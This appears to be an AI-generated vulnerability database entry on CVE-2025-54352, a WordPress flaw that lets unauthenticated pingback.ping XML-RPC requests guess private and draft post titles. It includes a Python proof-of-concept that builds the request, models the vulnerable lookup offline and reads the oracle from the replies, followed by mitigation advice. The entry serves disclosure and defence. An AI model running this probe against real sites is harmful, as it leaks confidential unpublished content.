
Cloud Vulnerability DB
A community-led vulnerabilities database
WordPress versions 3.5 through 6.8.2 contain a vulnerability (CVE-2025-54352) that allows unauthenticated remote attackers to guess the titles of private and draft posts through pingback.ping XML-RPC requests. The issue was discovered and reported by Imperva researchers in May 2025 and potentially affects every WordPress installation since December 2012, when WordPress 3.5 enabled XML-RPC by default (NVD, Imperva Blog).
The vulnerability lies in the pingback feature of WordPress's XML-RPC interface. The attacker sends a crafted POST request to the site's XML-RPC endpoint (xmlrpc.php) calling pingback.ping with a target URL on the victim site. While verifying that the target URL corresponds to an existing post in the MySQL database, the server falls back, when the target URL carries a fragment, to looking the post up by title: every character in the fragment outside a-z or 0-9 is neutralised by a regular expression (in the WordPress handler each such character becomes a single-character wildcard) and the result is matched against the titles of all posts, including private and draft ones, with no check of post status. Because the server's response differs depending on whether any title matched, each request acts as a yes/no oracle with which an attacker can confirm guessed words or phrases in titles that should not be visible to them. The vulnerability has been assigned a CVSS v3.1 base score of 3.7 (LOW) with vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N (NVD, Imperva Blog).
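The lookup and the resulting oracle, modelled offline as an added example (this is not code from this page, from Imperva or from WordPress). Both sides of the exchange are simulated with Python's xmlrpc.client: the attacker puts a guessed word in the fragment of the target URL, and the modelled server reproduces the title lookup as I read it in the WordPress pingback handler, where each character outside a-z/0-9 becomes a one-character wildcard and the result is matched, unanchored and case-insensitively, against post_title with no post_status filter. The fault codes the model returns (0 with an empty message for no match, a different fault otherwise), the attacker and victim URLs and the post table are assumptions and constructed sample data, not values from the page.

```python
"""Offline model of the pingback.ping title-guessing oracle (CVE-2025-54352).

Added example, not code from the page, Imperva or WordPress. Assumptions:
the WordPress handler turns every non-alphanumeric character of the target
URL's fragment into a one-character regex wildcard and RLIKE-matches the
result, unanchored, against post_title of every post regardless of status;
it answers fault 0 with an empty message when nothing matched and a different
fault when a post was found. URLs and post titles below are constructed.
"""
import re
import urllib.parse
import xmlrpc.client
from typing import Optional

ATTACKER_SOURCE = "http://attacker.example/some-page"   # constructed
VICTIM_SITE = "https://victim.example"                   # constructed

# Constructed post table: (post_title, post_status). The private and draft rows
# are what an unauthenticated caller must not be able to learn anything about.
SAMPLE_POSTS = [
    ("Welcome to the blog", "publish"),
    ("Q3 2025 Earnings Release", "private"),
    ("Layoffs announcement: 12% reduction", "draft"),
]


def build_pingback_request(source_url: str, target_url: str) -> bytes:
    """XML-RPC body for pingback.ping(sourceURI, targetURI): the POST body an
    attacker would send to /xmlrpc.php."""
    return xmlrpc.client.dumps((source_url, target_url),
                               methodname="pingback.ping").encode()


def fragment_to_pattern(fragment: str) -> str:
    """Model of preg_replace('/[^a-z0-9]/i', '.', $fragment): characters outside
    a-z/0-9 are not simply dropped; each becomes '.', a one-character wildcard
    once the string is used as an RLIKE pattern."""
    return re.sub(r"[^a-z0-9]", ".", fragment, flags=re.IGNORECASE)


def vulnerable_title_lookup(fragment: str, posts=SAMPLE_POSTS) -> Optional[str]:
    """Model of `SELECT ID FROM wp_posts WHERE post_title RLIKE %s`: unanchored,
    case-insensitive, over every post regardless of status. Returns the first
    matching title (standing in for the post ID) or None."""
    pattern = re.compile(fragment_to_pattern(fragment), re.IGNORECASE)
    for title, _status in posts:
        if pattern.search(title):
            return title
    return None


def simulate_server_reply(request_body: bytes, posts=SAMPLE_POSTS) -> str:
    """Modelled server side: parse the request, take the target URL's #fragment,
    run the vulnerable lookup and answer with a fault whose code leaks the result."""
    params, method = xmlrpc.client.loads(request_body)
    if method != "pingback.ping" or len(params) != 2:
        return xmlrpc.client.dumps(xmlrpc.client.Fault(-32601, "method not supported"))
    _source, target = params
    fragment = urllib.parse.urlparse(target).fragment
    if not fragment or vulnerable_title_lookup(fragment, posts) is None:
        # Assumed: "unknown error 0" with an empty message when no post is found.
        return xmlrpc.client.dumps(xmlrpc.client.Fault(0, ""))
    # Assumed: a post was found, so processing continues and fails later for an
    # unrelated reason (the attacker's source page carries no link to the target).
    return xmlrpc.client.dumps(xmlrpc.client.Fault(
        17, "The source URL does not contain a link to the target URL."))


def classify_reply(reply_body: str) -> str:
    """What the attacker learns from one reply: 'no-match' only for the assumed
    fault-0/empty-message case, 'match' for any other fault or for a success."""
    try:
        xmlrpc.client.loads(reply_body)
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 0 and fault.faultString == "":
            return "no-match"
        return "match"
    return "match"  # a non-fault reply means a pingback was registered on a real post


def probe_titles(site: str, guesses, posts=SAMPLE_POSTS) -> dict:
    """Run the oracle for each guess. The guess goes in the URL fragment so that
    the post-ID and path-based lookups both miss and the title branch is reached."""
    results = {}
    for guess in guesses:
        target = f"{site}/#{guess}"
        request = build_pingback_request(ATTACKER_SOURCE, target)
        reply = simulate_server_reply(request, posts)  # offline stand-in for the HTTP round trip
        results[guess] = classify_reply(reply)
    return results


if __name__ == "__main__":
    for guess, verdict in probe_titles(
            VICTIM_SITE, ["earnings", "Q3-2025", "layoff", "dividend"]).items():
        print(f"{guess!r:12} -> {verdict}")
```

Run as a script, "earnings" and "layoff" report a match even though the only posts containing them are private and draft, "Q3-2025" matches "Q3 2025" because the hyphen became a wildcard, and "dividend" reports no match. Against a live site one would POST the body from build_pingback_request to /xmlrpc.php and feed the HTTP response body to classify_reply.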
The vulnerability can lead to the exposure of sensitive information through the leakage of private and draft post titles. Historical examples demonstrate the potential severity: a premature release of earnings reports has previously led to significant market value losses, such as Google's case in 2012 where $22 billion in market value was erased. The leaked titles could also lead to insider trading, legal liabilities, and reputational damage (Imperva Blog).
Users are advised to update WordPress to the latest version or, if XML-RPC is not needed, to disable the endpoint. One caveat for the second option: the xmlrpc_enabled filter commonly used to "turn off XML-RPC" only gates the methods that require authentication, and pingback.ping is unauthenticated, so it must be removed separately (unset it in the xmlrpc_methods filter) or xmlrpc.php must be blocked at the web server or WAF; afterwards, a system.listMethods call should no longer list pingback.ping. Imperva customers are automatically protected through dedicated CWAF and WAF-GW rules, and a testing script is available to check whether a site is vulnerable (Imperva Blog).
Source: This report was generated using AI